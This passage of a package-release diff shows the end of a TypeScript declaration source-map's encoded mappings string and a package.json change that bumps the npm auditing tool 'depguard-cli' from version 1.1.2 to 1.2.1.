IAChB,GAAG,EAAE,MAAM,CAAA;IACX,UAAU,EAAE,WAAW,EAAE,CAAA;CAC1B;AAED,MAAM,WAAW,oBAAoB;IACnC,UAAU,EAAE,OAAO,CAAA;IACnB,OAAO,EAAE,MAAM,GAAG,IAAI,CAAA;IACtB,aAAa,EAAE,MAAM,CAAA;IACrB,MAAM,EAAE,MAAM,CAAA;CACf;AAED,sBAAsB;AACtB,MAAM,WAAW,WAAW;IAC1B,IAAI,EAAE,MAAM,CAAA;IACZ,KAAK,EAAE,MAAM,CAAA;IACb,SAAS,EAAE;QACT,QAAQ,EAAE,MAAM,CAAA;QAChB,WAAW,EAAE,MAAM,CAAA;QACnB,UAAU,EAAE,MAAM,CAAA;QAClB,OAAO,EAAE,MAAM,CAAA;QACf,YAAY,EAAE,MAAM,CAAA;KACrB,CAAA;IACD,QAAQ,EAAE,MAAM,EAAE,CAAA;CACnB;AAED,uCAAuC;AACvC,MAAM,WAAW,YAAY;IAC3B,QAAQ,EAAE,MAAM,CAAA;IAChB,WAAW,EAAE,MAAM,CAAA;IACnB,UAAU,EAAE,MAAM,CAAA;IAClB,OAAO,EAAE,MAAM,CAAA;IACf,YAAY,EAAE,MAAM,CAAA;CACrB;AAED,0BAA0B;AAC1B,MAAM,WAAW,WAAW;IAC1B,IAAI,EAAE,MAAM,CAAA;IACZ,OAAO,EAAE,MAAM,CAAA;IACf,WAAW,EAAE,MAAM,CAAA;IACnB,KAAK,EAAE,MAAM,CAAA;IACb,QAAQ,EAAE,MAAM,EAAE,CAAA;IAClB,IAAI,EAAE,MAAM,CAAA;CACb;AAED,qBAAqB;AACrB,MAAM,WAAW,aAAa;IAC5B,KAAK,CAAC,EAAE,MAAM,CAAA;IACd,aAAa,CAAC,EAAE,MAAM,CAAA;IACtB,QAAQ,CAAC,EAAE,MAAM,CAAA;IACjB,OAAO,CAAC,EAAE,OAAO,CAAA;CAClB;AAED,6BAA6B;AAC7B,MAAM,WAAW,cAAc;IAC7B,MAAM,EAAE,MAAM,CAAA;IACd,MAAM,EAAE,SAAS,GAAG,SAAS,GAAG,oBAAoB,CAAA;IACpD,OAAO,EAAE,MAAM,GAAG,IAAI,CAAA;IACtB,KAAK,EAAE,MAAM,GAAG,IAAI,CAAA;IACpB,YAAY,EAAE,KAAK,CAAC;QAAE,IAAI,EAAE,MAAM,CAAC;QAAC,KAAK,EAAE,MAAM,CAAA;KAAE,CAAC,CAAA;IACpD,SAAS,EAAE,MAAM,CAAA;IACjB,QAAQ,EAAE,MAAM,EAAE,CAAA;CACnB;AAED,sBAAsB;AACtB,MAAM,WAAW,cAAc;IAC7B,SAAS,CAAC,EAAE,MAAM,CAAA;IAClB,aAAa,CAAC,EAAE,MAAM,CAAA;IACtB,KAAK,CAAC,EAAE,MAAM,CAAA;IACd,OAAO,CAAC,EAAE,OAAO,CAAA;CAClB;AAED,2BAA2B;AAC3B,MAAM,WAAW,UAAU,CAAC,CAAC;IAC3B,IAAI,EAAE,CAAC,CAAA;IACP,SAAS,EAAE,MAAM,CAAA;CAClB"}

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "depguard-cli",
-  "version": "1.1.2",
+  "version": "1.2.1",
   "description": "Audit npm packages for security, maintenance, licenses and dependencies. Recommends install or write-from-scratch.",
   "author": "Jorge Morais",
   "license": "Apache-2.0",